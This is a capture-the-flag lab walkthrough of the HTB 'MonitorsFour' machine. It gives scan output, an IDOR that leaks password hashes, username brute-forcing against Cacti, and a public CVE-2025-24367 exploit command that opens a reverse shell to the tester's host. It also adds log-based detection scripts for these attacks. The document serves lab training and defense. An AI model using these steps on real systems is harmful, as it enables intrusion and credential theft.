# MonitorsFour HTB Walkthrough

### Scanning

```bash
nmap -p- --min-rate 1000 -vv 10.129.2.70
```

```bash
PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack ttl 127
5985/tcp open  wsman   syn-ack ttl 127
```

```bash
nmap -p80,5985 -sCV -v 10.129.2.70

PORT     STATE SERVICE REASON          VERSION
80/tcp   open  http    syn-ack ttl 127 nginx
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://monitorsfour.htb/
5985/tcp open  http    syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
```

> Port 80 redirects to `monitorsfour.htb`; add it to `/etc/hosts`.

### Website (80)

#### Directory Fuzzing

```bash
┌──(l1nuxkid㉿kai)-[~/HTB/MonitorsFour]
└─$ ffuf -u http://monitorsfour.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt -ac -ic

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://monitorsfour.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

bNNiacED                [Status: 200, Size: 97, Words: 1, Lines: 6, Duration: 100ms]
                        [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 101ms]
contact                 [Status: 200, Size: 367, Words: 34, Lines: 5, Duration: 104ms]
controllers             [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 103ms]
forgot-password         [Status: 200, Size: 3099, Words: 164, Lines: 84, Duration: 109ms]
login                   [Status: 200, Size: 4340, Words: 1342, Lines: 96, Duration: 167ms]
static                  [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 101ms]
user                    [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 406ms]
views                   [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 110ms]
:: Progress: [4615/4615] :: Job [1/1] :: 215 req/sec :: Duration: [0:00:16] :: Errors: 0 ::

```

#### IDOR: `/user` Endpoint

Browsing to `/user` returns:

```json
{"error": "Missing token parameter"}
```

Testing sequential values like `?token=1`, `?token=2` returns `invalid token`. But `?token=0` leaks sensitive data:

```
http://monitorsfour.htb/user?token=0
```

This reveals **usernames and MD5-hashed passwords**. The hashes were cracked using CrackStation:

```
Password: wonderful1
```

Candidate usernames extracted from the response:

* `admin` (Marcus Higgins)
* `mwatson`
* `janderson`
* `dthompson`
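
From the defender's side, the probing described above is visible in the web server's access log. The following is an added example (not part of the original walkthrough) that flags clients cycling through `token` values on `/user` and highlights any response much larger than the error replies. The log lines are constructed, and the 100-byte error-size ceiling and the three-value threshold are assumptions to tune per application.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed nginx "combined" log lines for illustration (not captured from the target).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2026:10:00:01 +0000] "GET /user HTTP/1.1" 200 35 "-" "curl/8.5"
203.0.113.7 - - [10/Jan/2026:10:00:02 +0000] "GET /user?token=1 HTTP/1.1" 200 26 "-" "curl/8.5"
203.0.113.7 - - [10/Jan/2026:10:00:03 +0000] "GET /user?token=2 HTTP/1.1" 200 26 "-" "curl/8.5"
203.0.113.7 - - [10/Jan/2026:10:00:04 +0000] "GET /user?token=0 HTTP/1.1" 200 1190 "-" "curl/8.5"
198.51.100.20 - - [10/Jan/2026:10:02:00 +0000] "GET /user?token=5f2c9a7e41d04b8c HTTP/1.1" 200 310 "-" "Mozilla/5.0"
198.51.100.20 - - [10/Jan/2026:10:02:05 +0000] "GET /login HTTP/1.1" 200 4340 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_token_probing(log_text, min_distinct=3, error_max_bytes=100):
    """Return {client_ip: {"tokens": [...], "large": [(token, bytes), ...]}} for
    clients that tried at least min_distinct different token values on /user."""
    seen = defaultdict(dict)  # ip -> {token value: largest response size seen}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        url = urlsplit(m["target"])
        if url.path != "/user":
            continue
        tokens = parse_qs(url.query, keep_blank_values=True).get("token")
        if not tokens:
            continue  # no token parameter: the "Missing token parameter" case
        size = 0 if m["size"] == "-" else int(m["size"])
        tok = tokens[0]
        seen[m["ip"]][tok] = max(size, seen[m["ip"]].get(tok, 0))

    findings = {}
    for ip, by_token in seen.items():
        if len(by_token) < min_distinct:
            continue  # a single token per client is normal use
        findings[ip] = {
            "tokens": sorted(by_token),
            # Responses larger than the error replies suggest data was returned.
            "large": sorted((t, s) for t, s in by_token.items() if s > error_max_bytes),
        }
    return findings

if __name__ == "__main__":
    for ip, hit in find_token_probing(SAMPLE_LOG).items():
        print(ip, "tokens tried:", hit["tokens"], "large responses:", hit["large"])
```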

### Vhost Enumeration

```
gobuster vhost -u http://monitorsfour.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

[+] Url:                       http://monitorsfour.htb
[+] Method:                    GET
[+] Threads:                   10
[+] Wordlist:                  /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:                gobuster/3.8
[+] Timeout:                   10s
[+] Append Domain:             true
[+] Exclude Hostname Length:   false
===============================================================

cacti.monitorsfour.htb Status: 302 [Size: 0] [--> /cacti]
```

Add `cacti.monitorsfour.htb` to `/etc/hosts` and browse to it. The login page exposes the Cacti version.

#### Username Enumeration

The password `wonderful1` is confirmed and there are several candidate usernames. The `admin` entry is marked `super user` and has a separate name field containing `marcus higgins`, so **Burp Suite Intruder** was used to brute-force the username field against the Cacti login endpoint.

The version is shown at the bottom of the page:

`Version 1.2.28 | (c) 2004-2026 - The Cacti Group`

Generate all possible usernames from the name:

```
username-anarchy Marcus Higgins | tee possible_username
```

Set the payload position on the `username` parameter only, use the candidate list as the wordlist, and filter by response length difference.

BOOM!

Login to `cacti.monitorsfour.htb` as `marcus` succeeds.

```
marcus :: wonderful1
```
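
The username guessing above leaves a recognisable pattern in authentication records: one source failing against many different usernames in a short window, then succeeding. The following is an added detection example (not part of the original walkthrough). The event tuple layout, the usernames and the thresholds are constructed assumptions, not Cacti's own log format.

```python
from collections import defaultdict, deque

# Constructed authentication events: (epoch_seconds, source_ip, username, success).
EVENTS = [
    (1000, "203.0.113.7", "mhiggins", False),
    (1001, "203.0.113.7", "m.higgins", False),
    (1002, "203.0.113.7", "marcush", False),
    (1003, "203.0.113.7", "higgins", False),
    (1004, "203.0.113.7", "marcus", True),
    (1010, "198.51.100.20", "janderson", False),   # ordinary typo, then success
    (1030, "198.51.100.20", "janderson", True),
]

def find_username_guessing(events, window=60, min_usernames=4):
    """Flag sources that fail logins for at least min_usernames distinct
    usernames within `window` seconds, and record any account that then
    authenticates successfully from the same source inside that window."""
    recent = defaultdict(deque)  # ip -> deque of (timestamp, username) failures
    alerts = {}
    for ts, ip, user, ok in sorted(events):
        q = recent[ip]
        while q and ts - q[0][0] > window:
            q.popleft()  # drop failures that fell out of the window
        if not ok:
            q.append((ts, user))
        tried = {u for _, u in q}
        if len(tried) < min_usernames:
            continue
        alert = alerts.setdefault(ip, {"tried": [], "succeeded": []})
        alert["tried"] = sorted(set(alert["tried"]) | tried)
        if ok:
            # A success right after a guessing burst is the account to reset first.
            alert["succeeded"].append(user)
    return alerts

if __name__ == "__main__":
    for ip, alert in find_username_guessing(EVENTS).items():
        print(ip, "tried", alert["tried"], "-> succeeded as", alert["succeeded"])
```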

### Initial Access: CVE-2025-24367 (Cacti Authenticated RCE)

POC: <https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC>

Cacti 1.2.28 is vulnerable to an authenticated remote code execution vulnerability.

```bash
git clone https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC.git
cd CVE-2025-24367-Cacti-PoC
python3 exploit.py -u marcus -p wonderful1 -url http://cacti.monitorsfour.htb -i 10.10.14.168 -l 443
```

Gained shell as `www-data` inside a **Docker container**.

### Post-Exploitation

#### Database Enumeration

Database credentials were found in the `.env` file. Connect to the internal MariaDB instance:

```
mysql -h mariadb -P 3306 -u monitorsdbuser -p monitorsfour_db
```

```
use monitorsfour_db;

MariaDB [monitorsfour_db]> show tables;
+---------------------------+
| Tables_in_monitorsfour_db |
+---------------------------+
| changelog                 |
| customers                 |
| invoice_tasks             |
| invoices                  |
| tasks                     |
| users                     |
+---------------------------+
```

### Privilege Escalation

